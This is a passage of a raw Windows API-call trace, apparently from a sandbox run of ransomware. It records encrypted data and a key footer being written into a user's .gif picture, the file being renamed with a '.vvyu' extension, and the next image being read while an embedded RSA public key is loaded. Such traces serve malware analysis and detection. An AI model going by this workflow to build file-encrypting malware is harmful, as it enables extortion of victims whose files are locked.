phHash=0x30ffa58) returned 1 [0187.452] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.452] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.452] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.452] GetLastError () returned 0x0 [0187.452] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.452] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.453] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.453] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.453] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x17470) returned 0x2d43778 [0187.453] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38c28 [0187.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39748 [0187.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38c70 [0187.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39730 [0187.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39718 [0187.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397a8 [0187.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39760 [0187.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0187.455] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0187.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397a8 [0187.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0187.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39760 [0187.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39718 [0187.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0187.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0187.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.458] GetCurrentThreadId () returned 0x264 [0187.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37c78 [0187.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0187.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.458] GetCurrentThreadId () returned 0x264 [0187.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397a8 [0187.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39718 [0187.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0187.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39760 [0187.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396d0 [0187.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397c0 [0187.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0187.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39790 [0187.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39778 [0187.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397d8 [0187.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39778 [0187.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0187.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39718 [0187.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0187.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0187.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0187.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0187.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39730 | out: hHeap=0x6a0000) returned 1 [0187.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38c70 | out: hHeap=0x6a0000) returned 1 [0187.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.471] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x17469, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x17469, lpOverlapped=0x0) returned 1 [0187.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0187.473] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1746e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.473] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.474] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.475] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.475] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.475] CloseHandle (hObject=0x584) returned 1 [0187.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0187.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.477] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ncx1xStIYX_cZWb.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ncx1xstiyx_czwb.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ncx1xStIYX_cZWb.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ncx1xstiyx_czwb.gif.vvyu")) returned 1 [0187.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.478] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.481] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56953840, ftCreationTime.dwHighDateTime=0x1d8a1fc, ftLastAccessTime.dwLowDateTime=0xfe260f00, ftLastAccessTime.dwHighDateTime=0x1d8a50b, ftLastWriteTime.dwLowDateTime=0xfe260f00, ftLastWriteTime.dwHighDateTime=0x1d8a50b, nFileSizeHigh=0x0, nFileSizeLow=0xa6ca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nIFn.gif", cAlternateFileName="")) returned 1 [0187.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38c70 [0187.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6fdf8 [0187.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38c70 | out: hHeap=0x6a0000) returned 1 [0187.481] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\nIFn.gif") returned=".gif" [0187.482] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\nIFn.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\nifn.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.483] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=42698) returned 1 [0187.483] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.486] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa6a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.486] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.489] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.489] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xa6ca, lpOverlapped=0x0) returned 1 [0187.490] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.490] 